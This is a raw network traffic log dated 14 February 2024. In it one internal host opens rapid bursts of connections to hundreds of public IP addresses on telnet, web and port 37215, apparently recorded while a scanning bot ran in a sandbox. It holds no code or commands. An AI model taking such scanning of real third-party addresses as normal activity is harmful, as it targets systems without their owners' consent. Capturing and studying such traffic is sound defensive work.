                                                            Feb 14, 2024 09:27:44.089771032 CET4069523192.168.2.2377.239.91.188
                                                            Feb 14, 2024 09:27:44.089771986 CET4069523192.168.2.23115.109.92.251
                                                            Feb 14, 2024 09:27:44.089787006 CET4069523192.168.2.231.141.86.128
                                                            Feb 14, 2024 09:27:44.089787006 CET4069523192.168.2.23136.180.144.4
                                                            Feb 14, 2024 09:27:44.089792967 CET4069523192.168.2.2340.132.175.230
                                                            Feb 14, 2024 09:27:44.089795113 CET406952323192.168.2.2399.86.23.114
                                                            Feb 14, 2024 09:27:44.089798927 CET4069523192.168.2.23134.203.17.153
                                                            Feb 14, 2024 09:27:44.089802980 CET4069523192.168.2.23159.214.65.146
                                                            Feb 14, 2024 09:27:44.089802980 CET4069523192.168.2.23171.34.13.115
                                                            Feb 14, 2024 09:27:44.089812994 CET4069523192.168.2.238.119.197.6
                                                            Feb 14, 2024 09:27:44.089818001 CET4069523192.168.2.231.118.194.116
                                                            Feb 14, 2024 09:27:44.089822054 CET4069523192.168.2.2314.132.211.58
                                                            Feb 14, 2024 09:27:44.089822054 CET4069523192.168.2.23208.254.44.55
                                                            Feb 14, 2024 09:27:44.089831114 CET4069523192.168.2.23115.221.111.227
                                                            Feb 14, 2024 09:27:44.089833021 CET4069523192.168.2.23151.229.182.89
                                                            Feb 14, 2024 09:27:44.089835882 CET406952323192.168.2.23197.22.95.150
                                                            Feb 14, 2024 09:27:44.089838028 CET4069523192.168.2.23125.6.47.243
                                                            Feb 14, 2024 09:27:44.089853048 CET4069523192.168.2.23170.164.76.56
                                                            Feb 14, 2024 09:27:44.089859009 CET4069523192.168.2.2372.44.75.94
                                                            Feb 14, 2024 09:27:44.089867115 CET4069523192.168.2.23146.181.26.104
                                                            Feb 14, 2024 09:27:44.089867115 CET4069523192.168.2.2383.220.174.12
                                                            Feb 14, 2024 09:27:44.089867115 CET4069523192.168.2.23175.163.92.237
                                                            Feb 14, 2024 09:27:44.089878082 CET4069523192.168.2.23198.190.251.105
                                                            Feb 14, 2024 09:27:44.089878082 CET4069523192.168.2.2394.133.44.25
                                                            Feb 14, 2024 09:27:44.089878082 CET4069523192.168.2.2366.152.85.31
                                                            Feb 14, 2024 09:27:44.089895964 CET4069523192.168.2.2350.168.235.223
                                                            Feb 14, 2024 09:27:44.089896917 CET4069523192.168.2.23197.101.80.234
                                                            Feb 14, 2024 09:27:44.089898109 CET406952323192.168.2.23164.74.32.146
                                                            Feb 14, 2024 09:27:44.089905024 CET4069523192.168.2.23162.0.251.76
                                                            Feb 14, 2024 09:27:44.155265093 CET804067288.98.198.103192.168.2.23
                                                            Feb 14, 2024 09:27:44.162405014 CET804067288.85.78.169192.168.2.23
                                                            Feb 14, 2024 09:27:44.178358078 CET804067288.157.101.154192.168.2.23
                                                            Feb 14, 2024 09:27:44.182534933 CET80803757831.136.123.97192.168.2.23
                                                            Feb 14, 2024 09:27:44.182698965 CET375788080192.168.2.2331.136.123.97
                                                            Feb 14, 2024 09:27:44.182774067 CET375788080192.168.2.2331.136.123.97
                                                            Feb 14, 2024 09:27:44.183393955 CET804067288.87.102.213192.168.2.23
                                                            Feb 14, 2024 09:27:44.209486961 CET80804709631.136.121.101192.168.2.23
                                                            Feb 14, 2024 09:27:44.209613085 CET470968080192.168.2.2331.136.121.101
                                                            Feb 14, 2024 09:27:44.209613085 CET470968080192.168.2.2331.136.121.101
                                                            Feb 14, 2024 09:27:44.211608887 CET80804142431.136.155.230192.168.2.23
                                                            Feb 14, 2024 09:27:44.211704969 CET414248080192.168.2.2331.136.155.230
                                                            Feb 14, 2024 09:27:44.211705923 CET414248080192.168.2.2331.136.155.230
                                                            Feb 14, 2024 09:27:44.227469921 CET80805106031.136.149.44192.168.2.23
                                                            Feb 14, 2024 09:27:44.227555990 CET510608080192.168.2.2331.136.149.44
                                                            Feb 14, 2024 09:27:44.227555990 CET510608080192.168.2.2331.136.149.44
                                                            Feb 14, 2024 09:27:44.229254961 CET80805664285.66.48.193192.168.2.23
                                                            Feb 14, 2024 09:27:44.229415894 CET80805664285.66.48.193192.168.2.23
                                                            Feb 14, 2024 09:27:44.229463100 CET566428080192.168.2.2385.66.48.193
                                                            Feb 14, 2024 09:27:44.229540110 CET80805665885.66.48.193192.168.2.23
                                                            Feb 14, 2024 09:27:44.229610920 CET566588080192.168.2.2385.66.48.193
                                                            Feb 14, 2024 09:27:44.229610920 CET566588080192.168.2.2385.66.48.193
                                                            Feb 14, 2024 09:27:44.231565952 CET804067288.214.22.1192.168.2.23
                                                            Feb 14, 2024 09:27:44.256481886 CET232340695168.227.3.18192.168.2.23
                                                            Feb 14, 2024 09:27:44.261786938 CET583508080192.168.2.2331.136.47.252
                                                            Feb 14, 2024 09:27:44.276937962 CET80805875094.123.89.175192.168.2.23
                                                            Feb 14, 2024 09:27:44.277020931 CET80805876494.123.89.175192.168.2.23
                                                            Feb 14, 2024 09:27:44.277084112 CET587648080192.168.2.2394.123.89.175
                                                            Feb 14, 2024 09:27:44.277084112 CET587648080192.168.2.2394.123.89.175
                                                            Feb 14, 2024 09:27:44.309948921 CET234069584.197.215.130192.168.2.23
                                                            Feb 14, 2024 09:27:44.320523024 CET232340695154.51.7.251192.168.2.23
                                                            Feb 14, 2024 09:27:44.346725941 CET8038972112.124.185.183192.168.2.23
                                                            Feb 14, 2024 09:27:44.346921921 CET3897280192.168.2.23112.124.185.183
                                                            Feb 14, 2024 09:27:44.347059965 CET3897280192.168.2.23112.124.185.183
                                                            Feb 14, 2024 09:27:44.347093105 CET3897280192.168.2.23112.124.185.183
                                                            Feb 14, 2024 09:27:44.347194910 CET3898680192.168.2.23112.124.185.183
                                                            Feb 14, 2024 09:27:44.378592014 CET2340695220.133.172.96192.168.2.23
                                                            Feb 14, 2024 09:27:44.442028999 CET2340695113.125.141.37192.168.2.23
                                                            Feb 14, 2024 09:27:44.451314926 CET80805665885.66.48.193192.168.2.23
                                                            Feb 14, 2024 09:27:44.451435089 CET566588080192.168.2.2385.66.48.193
                                                            Feb 14, 2024 09:27:44.526463032 CET80805876494.123.89.175192.168.2.23
                                                            Feb 14, 2024 09:27:44.609046936 CET80804068485.26.228.101192.168.2.23
                                                            Feb 14, 2024 09:27:44.613548994 CET375708080192.168.2.2331.136.123.97
                                                            Feb 14, 2024 09:27:44.688658953 CET8038986112.124.185.183192.168.2.23
                                                            Feb 14, 2024 09:27:44.688909054 CET3898680192.168.2.23112.124.185.183
                                                            Feb 14, 2024 09:27:44.689088106 CET3898680192.168.2.23112.124.185.183
                                                            Feb 14, 2024 09:27:44.689233065 CET4067280192.168.2.2395.189.44.205
                                                            Feb 14, 2024 09:27:44.689264059 CET4067280192.168.2.2395.103.93.234
                                                            Feb 14, 2024 09:27:44.689291954 CET4067280192.168.2.2395.34.210.176
                                                            Feb 14, 2024 09:27:44.689291000 CET4067280192.168.2.2395.43.51.33
                                                            Feb 14, 2024 09:27:44.689302921 CET4067280192.168.2.2395.212.241.115
                                                            Feb 14, 2024 09:27:44.689321995 CET4067280192.168.2.2395.147.86.79
                                                            Feb 14, 2024 09:27:44.689341068 CET4067280192.168.2.2395.177.45.108
                                                            Feb 14, 2024 09:27:44.689359903 CET4067280192.168.2.2395.4.51.248
                                                            Feb 14, 2024 09:27:44.689371109 CET4067280192.168.2.2395.34.236.12
                                                            Feb 14, 2024 09:27:44.689388990 CET4067280192.168.2.2395.210.168.233
                                                            Feb 14, 2024 09:27:44.689409971 CET4067280192.168.2.2395.9.191.148
                                                            Feb 14, 2024 09:27:44.689426899 CET4067280192.168.2.2395.5.180.137
                                                            Feb 14, 2024 09:27:44.689444065 CET4067280192.168.2.2395.180.12.175
                                                            Feb 14, 2024 09:27:44.689460993 CET4067280192.168.2.2395.195.39.240
                                                            Feb 14, 2024 09:27:44.689511061 CET4067280192.168.2.2395.77.60.84
                                                            Feb 14, 2024 09:27:44.689516068 CET4067280192.168.2.2395.201.157.194
                                                            Feb 14, 2024 09:27:44.689539909 CET4067280192.168.2.2395.214.249.111
                                                            Feb 14, 2024 09:27:44.689555883 CET4067280192.168.2.2395.97.21.58
                                                            Feb 14, 2024 09:27:44.689578056 CET4067280192.168.2.2395.169.78.47
                                                            Feb 14, 2024 09:27:44.689589024 CET4067280192.168.2.2395.156.61.165
                                                            Feb 14, 2024 09:27:44.689610004 CET4067280192.168.2.2395.158.39.50
                                                            Feb 14, 2024 09:27:44.689618111 CET4067280192.168.2.2395.168.156.206
                                                            Feb 14, 2024 09:27:44.689640999 CET4067280192.168.2.2395.109.234.121
                                                            Feb 14, 2024 09:27:44.689654112 CET4067280192.168.2.2395.214.222.151
                                                            Feb 14, 2024 09:27:44.689670086 CET4067280192.168.2.2395.153.184.100
                                                            Feb 14, 2024 09:27:44.689682961 CET4067280192.168.2.2395.121.134.239
                                                            Feb 14, 2024 09:27:44.689703941 CET4067280192.168.2.2395.84.182.181
                                                            Feb 14, 2024 09:27:44.689709902 CET4067280192.168.2.2395.169.237.154
                                                            Feb 14, 2024 09:27:44.689728975 CET4067280192.168.2.2395.121.3.163
                                                            Feb 14, 2024 09:27:44.689754009 CET4067280192.168.2.2395.234.11.64
                                                            Feb 14, 2024 09:27:44.689759016 CET4067280192.168.2.2395.153.225.249
                                                            Feb 14, 2024 09:27:44.689770937 CET4067280192.168.2.2395.17.213.2
                                                            Feb 14, 2024 09:27:44.689789057 CET4067280192.168.2.2395.32.168.20
                                                            Feb 14, 2024 09:27:44.689806938 CET4067280192.168.2.2395.255.215.13
                                                            Feb 14, 2024 09:27:44.689826965 CET4067280192.168.2.2395.163.147.167
                                                            Feb 14, 2024 09:27:44.689852953 CET4067280192.168.2.2395.19.192.159
                                                            Feb 14, 2024 09:27:44.689865112 CET4067280192.168.2.2395.27.225.222
                                                            Feb 14, 2024 09:27:44.689884901 CET4067280192.168.2.2395.133.201.85
                                                            Feb 14, 2024 09:27:44.689910889 CET4067280192.168.2.2395.50.14.6
                                                            Feb 14, 2024 09:27:44.689920902 CET4067280192.168.2.2395.61.178.142
                                                            Feb 14, 2024 09:27:44.689924002 CET4067280192.168.2.2395.171.190.186
                                                            Feb 14, 2024 09:27:44.689935923 CET4067280192.168.2.2395.124.107.124
                                                            Feb 14, 2024 09:27:44.689976931 CET4067280192.168.2.2395.54.189.105
                                                            Feb 14, 2024 09:27:44.689977884 CET4067280192.168.2.2395.80.133.90
                                                            Feb 14, 2024 09:27:44.689992905 CET4067280192.168.2.2395.52.45.225
                                                            Feb 14, 2024 09:27:44.690011024 CET4067280192.168.2.2395.180.242.5
                                                            Feb 14, 2024 09:27:44.690041065 CET4067280192.168.2.2395.57.78.114
                                                            Feb 14, 2024 09:27:44.690057039 CET4067280192.168.2.2395.3.34.222
                                                            Feb 14, 2024 09:27:44.690068960 CET4067280192.168.2.2395.34.10.135
                                                            Feb 14, 2024 09:27:44.690082073 CET4067280192.168.2.2395.231.186.232
                                                            Feb 14, 2024 09:27:44.690099955 CET4067280192.168.2.2395.223.108.246
                                                            Feb 14, 2024 09:27:44.690112114 CET4067280192.168.2.2395.141.153.182
                                                            Feb 14, 2024 09:27:44.690128088 CET4067280192.168.2.2395.10.3.35
                                                            Feb 14, 2024 09:27:44.690151930 CET4067280192.168.2.2395.104.76.247
                                                            Feb 14, 2024 09:27:44.690155029 CET4067280192.168.2.2395.21.23.101
                                                            Feb 14, 2024 09:27:44.690171957 CET4067280192.168.2.2395.37.148.69
                                                            Feb 14, 2024 09:27:44.690182924 CET4067280192.168.2.2395.133.19.12
                                                            Feb 14, 2024 09:27:44.690201998 CET4067280192.168.2.2395.198.110.82
                                                            Feb 14, 2024 09:27:44.690231085 CET4067280192.168.2.2395.97.5.189
                                                            Feb 14, 2024 09:27:44.690254927 CET4067280192.168.2.2395.170.253.105
                                                            Feb 14, 2024 09:27:44.690259933 CET4067280192.168.2.2395.131.104.157
                                                            Feb 14, 2024 09:27:44.690291882 CET4067280192.168.2.2395.18.133.80
                                                            Feb 14, 2024 09:27:44.690291882 CET4067280192.168.2.2395.164.226.242
                                                            Feb 14, 2024 09:27:44.690323114 CET4067280192.168.2.2395.203.107.179
                                                            Feb 14, 2024 09:27:44.690325022 CET4067280192.168.2.2395.174.65.51
                                                            Feb 14, 2024 09:27:44.690334082 CET4067280192.168.2.2395.193.137.212
                                                            Feb 14, 2024 09:27:44.690350056 CET4067280192.168.2.2395.101.71.205
                                                            Feb 14, 2024 09:27:44.690373898 CET4067280192.168.2.2395.0.35.90
                                                            Feb 14, 2024 09:27:44.690392971 CET4067280192.168.2.2395.200.38.221
                                                            Feb 14, 2024 09:27:44.690409899 CET4067280192.168.2.2395.245.210.235
                                                            Feb 14, 2024 09:27:44.690421104 CET4067280192.168.2.2395.67.252.30
                                                            Feb 14, 2024 09:27:44.690438986 CET4067280192.168.2.2395.233.85.22
                                                            Feb 14, 2024 09:27:44.690459013 CET4067280192.168.2.2395.214.102.243
                                                            Feb 14, 2024 09:27:44.690476894 CET4067280192.168.2.2395.140.12.158
                                                            Feb 14, 2024 09:27:44.690489054 CET4067280192.168.2.2395.160.161.173
                                                            Feb 14, 2024 09:27:44.690507889 CET4067280192.168.2.2395.221.12.38
                                                            Feb 14, 2024 09:27:44.690519094 CET4067280192.168.2.2395.145.172.88
                                                            Feb 14, 2024 09:27:44.690542936 CET4067280192.168.2.2395.122.107.188
                                                            Feb 14, 2024 09:27:44.690562963 CET4067280192.168.2.2395.181.248.134
                                                            Feb 14, 2024 09:27:44.690577984 CET4067280192.168.2.2395.126.231.29
                                                            Feb 14, 2024 09:27:44.690587044 CET4067280192.168.2.2395.122.27.67
                                                            Feb 14, 2024 09:27:44.690608978 CET4067280192.168.2.2395.108.55.75
                                                            Feb 14, 2024 09:27:44.690623999 CET4067280192.168.2.2395.5.21.141
                                                            Feb 14, 2024 09:27:44.690649033 CET4067280192.168.2.2395.162.239.15
                                                            Feb 14, 2024 09:27:44.690654993 CET4067280192.168.2.2395.108.103.46
                                                            Feb 14, 2024 09:27:44.690665007 CET4067280192.168.2.2395.227.173.240
                                                            Feb 14, 2024 09:27:44.690680027 CET4067280192.168.2.2395.99.218.48
                                                            Feb 14, 2024 09:27:44.690694094 CET4067280192.168.2.2395.204.32.8
                                                            Feb 14, 2024 09:27:44.690706968 CET4067280192.168.2.2395.68.74.161
                                                            Feb 14, 2024 09:27:44.690741062 CET4067280192.168.2.2395.38.77.72
                                                            Feb 14, 2024 09:27:44.690742970 CET4067280192.168.2.2395.140.139.190
                                                            Feb 14, 2024 09:27:44.690753937 CET4067280192.168.2.2395.44.159.229
                                                            Feb 14, 2024 09:27:44.690776110 CET4067280192.168.2.2395.59.98.28
                                                            Feb 14, 2024 09:27:44.690793037 CET4067280192.168.2.2395.205.127.107
                                                            Feb 14, 2024 09:27:44.690804958 CET4067280192.168.2.2395.161.16.160
                                                            Feb 14, 2024 09:27:44.690821886 CET4067280192.168.2.2395.150.134.62
                                                            Feb 14, 2024 09:27:44.690829039 CET4067280192.168.2.2395.105.100.157
                                                            Feb 14, 2024 09:27:44.690853119 CET4067280192.168.2.2395.12.152.50
                                                            Feb 14, 2024 09:27:44.690874100 CET4067280192.168.2.2395.124.254.196
                                                            Feb 14, 2024 09:27:44.690886021 CET4067280192.168.2.2395.205.78.56
                                                            Feb 14, 2024 09:27:44.690900087 CET4067280192.168.2.2395.139.207.53
                                                            Feb 14, 2024 09:27:44.690916061 CET4067280192.168.2.2395.15.197.244
                                                            Feb 14, 2024 09:27:44.690933943 CET4067280192.168.2.2395.126.129.165
                                                            Feb 14, 2024 09:27:44.690942049 CET4067280192.168.2.2395.249.196.129
                                                            Feb 14, 2024 09:27:44.690977097 CET4067280192.168.2.2395.214.214.208
                                                            Feb 14, 2024 09:27:44.690995932 CET4067280192.168.2.2395.150.105.180
                                                            Feb 14, 2024 09:27:44.691015959 CET4067280192.168.2.2395.136.125.158
                                                            Feb 14, 2024 09:27:44.691030025 CET4067280192.168.2.2395.9.203.17
                                                            Feb 14, 2024 09:27:44.691044092 CET4067280192.168.2.2395.163.184.82
                                                            Feb 14, 2024 09:27:44.691052914 CET4067280192.168.2.2395.92.14.190
                                                            Feb 14, 2024 09:27:44.691068888 CET4067280192.168.2.2395.134.130.186
                                                            Feb 14, 2024 09:27:44.691088915 CET4067280192.168.2.2395.243.178.185
                                                            Feb 14, 2024 09:27:44.691098928 CET4067280192.168.2.2395.78.26.146
                                                            Feb 14, 2024 09:27:44.691116095 CET4067280192.168.2.2395.84.70.70
                                                            Feb 14, 2024 09:27:44.691140890 CET4067280192.168.2.2395.66.240.74
                                                            Feb 14, 2024 09:27:44.691154957 CET4067280192.168.2.2395.81.106.117
                                                            Feb 14, 2024 09:27:44.691171885 CET4067280192.168.2.2395.105.238.239
                                                            Feb 14, 2024 09:27:44.691185951 CET4067280192.168.2.2395.149.44.196
                                                            Feb 14, 2024 09:27:44.691203117 CET4067280192.168.2.2395.222.252.107
                                                            Feb 14, 2024 09:27:44.691212893 CET4067280192.168.2.2395.185.74.96
                                                            Feb 14, 2024 09:27:44.691232920 CET4067280192.168.2.2395.77.182.41
                                                            Feb 14, 2024 09:27:44.691246033 CET4067280192.168.2.2395.244.30.167
                                                            Feb 14, 2024 09:27:44.691261053 CET4067280192.168.2.2395.65.110.39
                                                            Feb 14, 2024 09:27:44.691278934 CET4067280192.168.2.2395.197.26.133
                                                            Feb 14, 2024 09:27:44.691291094 CET4067280192.168.2.2395.90.14.22
                                                            Feb 14, 2024 09:27:44.691306114 CET4067280192.168.2.2395.60.0.48
                                                            Feb 14, 2024 09:27:44.691318035 CET4067280192.168.2.2395.127.134.255
                                                            Feb 14, 2024 09:27:44.691334009 CET4067280192.168.2.2395.92.166.130
                                                            Feb 14, 2024 09:27:44.691344976 CET4067280192.168.2.2395.15.21.18
                                                            Feb 14, 2024 09:27:44.691370964 CET4067280192.168.2.2395.33.68.71
                                                            Feb 14, 2024 09:27:44.691382885 CET4067280192.168.2.2395.62.231.44
                                                            Feb 14, 2024 09:27:44.691426039 CET4067280192.168.2.2395.237.111.135
                                                            Feb 14, 2024 09:27:44.691432953 CET4067280192.168.2.2395.147.84.195
                                                            Feb 14, 2024 09:27:44.691447973 CET4067280192.168.2.2395.72.182.226
                                                            Feb 14, 2024 09:27:44.691462994 CET4067280192.168.2.2395.249.162.230
                                                            Feb 14, 2024 09:27:44.691478014 CET4067280192.168.2.2395.195.96.231
                                                            Feb 14, 2024 09:27:44.691518068 CET4067280192.168.2.2395.208.139.217
                                                            Feb 14, 2024 09:27:44.691524029 CET4067280192.168.2.2395.115.12.158
                                                            Feb 14, 2024 09:27:44.691541910 CET4067280192.168.2.2395.72.30.144
                                                            Feb 14, 2024 09:27:44.691549063 CET4067280192.168.2.2395.193.116.104
                                                            Feb 14, 2024 09:27:44.691560030 CET4067280192.168.2.2395.111.147.129
                                                            Feb 14, 2024 09:27:44.691598892 CET4067280192.168.2.2395.133.57.151
                                                            Feb 14, 2024 09:27:44.691601038 CET4067280192.168.2.2395.72.206.239
                                                            Feb 14, 2024 09:27:44.691623926 CET4067280192.168.2.2395.243.89.194
                                                            Feb 14, 2024 09:27:44.691647053 CET4067280192.168.2.2395.239.58.194
                                                            Feb 14, 2024 09:27:44.691652060 CET4067280192.168.2.2395.74.199.222
                                                            Feb 14, 2024 09:27:44.691672087 CET4067280192.168.2.2395.153.196.70
                                                            Feb 14, 2024 09:27:44.691684961 CET4067280192.168.2.2395.172.32.62
                                                            Feb 14, 2024 09:27:44.691711903 CET4067280192.168.2.2395.15.26.255
                                                            Feb 14, 2024 09:27:44.691714048 CET4067280192.168.2.2395.153.227.158
                                                            Feb 14, 2024 09:27:44.691735029 CET4067280192.168.2.2395.220.114.220
                                                            Feb 14, 2024 09:27:44.691741943 CET4067280192.168.2.2395.196.140.23
                                                            Feb 14, 2024 09:27:44.691760063 CET4067280192.168.2.2395.24.96.222
                                                            Feb 14, 2024 09:27:44.691772938 CET4067280192.168.2.2395.199.249.140
                                                            Feb 14, 2024 09:27:44.691792011 CET4067280192.168.2.2395.213.203.34
                                                            Feb 14, 2024 09:27:44.691812992 CET4067280192.168.2.2395.253.64.232
                                                            Feb 14, 2024 09:27:44.691823006 CET4067280192.168.2.2395.17.53.244
                                                            Feb 14, 2024 09:27:44.691843987 CET4067280192.168.2.2395.148.153.11
                                                            Feb 14, 2024 09:27:44.691857100 CET4067280192.168.2.2395.249.124.49
                                                            Feb 14, 2024 09:27:44.691883087 CET4067280192.168.2.2395.72.255.127
                                                            Feb 14, 2024 09:27:44.700444937 CET8038972112.124.185.183192.168.2.23
                                                            Feb 14, 2024 09:27:44.700620890 CET8038972112.124.185.183192.168.2.23
                                                            Feb 14, 2024 09:27:44.700670958 CET3897280192.168.2.23112.124.185.183
                                                            Feb 14, 2024 09:27:44.709553003 CET414108080192.168.2.2331.136.155.230
                                                            Feb 14, 2024 09:27:44.709559917 CET470808080192.168.2.2331.136.121.101
                                                            Feb 14, 2024 09:27:44.709573984 CET510448080192.168.2.2331.136.149.44
                                                            Feb 14, 2024 09:27:44.805634975 CET375788080192.168.2.2331.136.123.97
                                                            Feb 14, 2024 09:27:44.813257933 CET804067295.164.226.242192.168.2.23
                                                            Feb 14, 2024 09:27:44.837537050 CET414248080192.168.2.2331.136.155.230
                                                            Feb 14, 2024 09:27:44.837551117 CET470968080192.168.2.2331.136.121.101
                                                            Feb 14, 2024 09:27:44.880199909 CET4067537215192.168.2.23197.107.54.187
                                                            Feb 14, 2024 09:27:44.880237103 CET4067537215192.168.2.23197.46.136.115
                                                            Feb 14, 2024 09:27:44.880245924 CET4067537215192.168.2.23197.230.217.126
                                                            Feb 14, 2024 09:27:44.880248070 CET4067537215192.168.2.23197.105.51.161
                                                            Feb 14, 2024 09:27:44.880249023 CET4067537215192.168.2.23197.65.169.64
                                                            Feb 14, 2024 09:27:44.880248070 CET4067537215192.168.2.23197.249.211.207
                                                            Feb 14, 2024 09:27:44.880269051 CET4067537215192.168.2.23197.90.164.101
                                                            Feb 14, 2024 09:27:44.880279064 CET4067537215192.168.2.23197.34.85.13
                                                            Feb 14, 2024 09:27:44.880295992 CET4067537215192.168.2.23197.57.157.156
                                                            Feb 14, 2024 09:27:44.880315065 CET4067537215192.168.2.23197.79.183.149
                                                            Feb 14, 2024 09:27:44.880315065 CET4067537215192.168.2.23197.81.98.141
                                                            Feb 14, 2024 09:27:44.880331993 CET4067537215192.168.2.23197.189.36.22
                                                            Feb 14, 2024 09:27:44.880352974 CET4067537215192.168.2.23197.225.171.99
                                                            Feb 14, 2024 09:27:44.880384922 CET4067537215192.168.2.23197.201.64.25
                                                            Feb 14, 2024 09:27:44.880393982 CET4067537215192.168.2.23197.14.102.126
                                                            Feb 14, 2024 09:27:44.880402088 CET4067537215192.168.2.23197.170.144.246
                                                            Feb 14, 2024 09:27:44.880425930 CET4067537215192.168.2.23197.79.47.127
                                                            Feb 14, 2024 09:27:44.880495071 CET4067537215192.168.2.23197.164.13.82
                                                            Feb 14, 2024 09:27:44.880522966 CET4067537215192.168.2.23197.144.164.74
                                                            Feb 14, 2024 09:27:44.880532026 CET4067537215192.168.2.23197.26.83.101
                                                            Feb 14, 2024 09:27:44.880534887 CET4067537215192.168.2.23197.32.91.148
                                                            Feb 14, 2024 09:27:44.880537033 CET4067537215192.168.2.23197.18.204.218
                                                            Feb 14, 2024 09:27:44.880546093 CET4067537215192.168.2.23197.234.210.201
                                                            Feb 14, 2024 09:27:44.880553961 CET4067537215192.168.2.23197.32.52.28
                                                            Feb 14, 2024 09:27:44.880564928 CET4067537215192.168.2.23197.123.71.133
                                                            Feb 14, 2024 09:27:44.880568981 CET4067537215192.168.2.23197.72.127.18
                                                            Feb 14, 2024 09:27:44.880577087 CET4067537215192.168.2.23197.123.111.113
                                                            Feb 14, 2024 09:27:44.880590916 CET4067537215192.168.2.23197.39.130.216
                                                            Feb 14, 2024 09:27:44.880630016 CET4067537215192.168.2.23197.36.92.135
                                                            Feb 14, 2024 09:27:44.880630016 CET4067537215192.168.2.23197.156.98.61
                                                            Feb 14, 2024 09:27:44.880636930 CET4067537215192.168.2.23197.37.85.198
                                                            Feb 14, 2024 09:27:44.880645037 CET4067537215192.168.2.23197.191.226.93
                                                            Feb 14, 2024 09:27:44.880661964 CET4067537215192.168.2.23197.5.150.203
                                                            Feb 14, 2024 09:27:44.880680084 CET4067537215192.168.2.23197.87.74.21
                                                            Feb 14, 2024 09:27:44.880688906 CET4067537215192.168.2.23197.48.198.101
                                                            Feb 14, 2024 09:27:44.880722046 CET4067537215192.168.2.23197.206.251.181
                                                            Feb 14, 2024 09:27:44.880728960 CET4067537215192.168.2.23197.207.3.112
                                                            Feb 14, 2024 09:27:44.880740881 CET4067537215192.168.2.23197.209.38.74
                                                            Feb 14, 2024 09:27:44.880750895 CET4067537215192.168.2.23197.55.197.163
                                                            Feb 14, 2024 09:27:44.880781889 CET4067537215192.168.2.23197.96.254.48
                                                            Feb 14, 2024 09:27:44.880800962 CET4067537215192.168.2.23197.20.152.212
                                                            Feb 14, 2024 09:27:44.880808115 CET4067537215192.168.2.23197.223.52.192
                                                            Feb 14, 2024 09:27:44.880827904 CET4067537215192.168.2.23197.85.35.37
                                                            Feb 14, 2024 09:27:44.880836964 CET4067537215192.168.2.23197.38.129.43
                                                            Feb 14, 2024 09:27:44.880867004 CET4067537215192.168.2.23197.109.147.113
                                                            Feb 14, 2024 09:27:44.880880117 CET4067537215192.168.2.23197.2.159.198
                                                            Feb 14, 2024 09:27:44.880904913 CET4067537215192.168.2.23197.127.170.107
                                                            Feb 14, 2024 09:27:44.880922079 CET4067537215192.168.2.23197.76.16.204
                                                            Feb 14, 2024 09:27:44.880934000 CET4067537215192.168.2.23197.199.146.28
                                                            Feb 14, 2024 09:27:44.880959034 CET4067537215192.168.2.23197.140.4.251
                                                            Feb 14, 2024 09:27:44.880979061 CET4067537215192.168.2.23197.130.72.140
                                                            Feb 14, 2024 09:27:44.880980015 CET4067537215192.168.2.23197.156.158.58
                                                            Feb 14, 2024 09:27:44.880996943 CET4067537215192.168.2.23197.103.197.130
                                                            Feb 14, 2024 09:27:44.881006956 CET4067537215192.168.2.23197.249.223.171
                                                            Feb 14, 2024 09:27:44.881012917 CET4067537215192.168.2.23197.211.108.210
                                                            Feb 14, 2024 09:27:44.881022930 CET4067537215192.168.2.23197.110.77.169
                                                            Feb 14, 2024 09:27:44.881041050 CET4067537215192.168.2.23197.208.52.239
                                                            Feb 14, 2024 09:27:44.881052971 CET4067537215192.168.2.23197.195.62.213
                                                            Feb 14, 2024 09:27:44.881062984 CET4067537215192.168.2.23197.44.46.113
                                                            Feb 14, 2024 09:27:44.881083012 CET4067537215192.168.2.23197.162.37.86
                                                            Feb 14, 2024 09:27:44.881108046 CET4067537215192.168.2.23197.64.123.153
                                                            Feb 14, 2024 09:27:44.881120920 CET4067537215192.168.2.23197.101.85.80
                                                            Feb 14, 2024 09:27:44.881130934 CET4067537215192.168.2.23197.0.16.195
                                                            Feb 14, 2024 09:27:44.881148100 CET4067537215192.168.2.23197.218.12.109
                                                            Feb 14, 2024 09:27:44.881164074 CET4067537215192.168.2.23197.175.172.227
                                                            Feb 14, 2024 09:27:44.881172895 CET4067537215192.168.2.23197.249.180.31
                                                            Feb 14, 2024 09:27:44.881189108 CET4067537215192.168.2.23197.111.220.214
                                                            Feb 14, 2024 09:27:44.881203890 CET4067537215192.168.2.23197.6.218.76
                                                            Feb 14, 2024 09:27:44.881228924 CET4067537215192.168.2.23197.32.163.110
                                                            Feb 14, 2024 09:27:44.881258011 CET4067537215192.168.2.23197.51.118.21
                                                            Feb 14, 2024 09:27:44.881278992 CET4067537215192.168.2.23197.90.24.142
                                                            Feb 14, 2024 09:27:44.881292105 CET4067537215192.168.2.23197.254.228.119
                                                            Feb 14, 2024 09:27:44.881309032 CET4067537215192.168.2.23197.152.112.227
                                                            Feb 14, 2024 09:27:44.881321907 CET4067537215192.168.2.23197.47.114.53
                                                            Feb 14, 2024 09:27:44.881339073 CET4067537215192.168.2.23197.62.99.83
                                                            Feb 14, 2024 09:27:44.881347895 CET4067537215192.168.2.23197.94.34.14
                                                            Feb 14, 2024 09:27:44.881366968 CET4067537215192.168.2.23197.167.27.194
                                                            Feb 14, 2024 09:27:44.881388903 CET4067537215192.168.2.23197.126.99.58
                                                            Feb 14, 2024 09:27:44.881402016 CET4067537215192.168.2.23197.38.77.205
                                                            Feb 14, 2024 09:27:44.881413937 CET4067537215192.168.2.23197.15.175.71
                                                            Feb 14, 2024 09:27:44.881428957 CET4067537215192.168.2.23197.33.142.146
                                                            Feb 14, 2024 09:27:44.881459951 CET4067537215192.168.2.23197.15.25.180
                                                            Feb 14, 2024 09:27:44.881472111 CET4067537215192.168.2.23197.2.65.205
                                                            Feb 14, 2024 09:27:44.881486893 CET4067537215192.168.2.23197.208.91.132
                                                            Feb 14, 2024 09:27:44.881514072 CET4067537215192.168.2.23197.11.160.170
                                                            Feb 14, 2024 09:27:44.881531954 CET4067537215192.168.2.23197.69.35.146
                                                            Feb 14, 2024 09:27:44.881548882 CET4067537215192.168.2.23197.57.132.230
                                                            Feb 14, 2024 09:27:44.881563902 CET4067537215192.168.2.23197.155.36.204
                                                            Feb 14, 2024 09:27:44.881577969 CET4067537215192.168.2.23197.178.200.138
                                                            Feb 14, 2024 09:27:44.881603003 CET4067537215192.168.2.23197.188.13.68
                                                            Feb 14, 2024 09:27:44.881616116 CET4067537215192.168.2.23197.76.254.157
                                                            Feb 14, 2024 09:27:44.881634951 CET4067537215192.168.2.23197.75.228.250
                                                            Feb 14, 2024 09:27:44.881648064 CET4067537215192.168.2.23197.5.37.252
                                                            Feb 14, 2024 09:27:44.881665945 CET4067537215192.168.2.23197.57.180.192
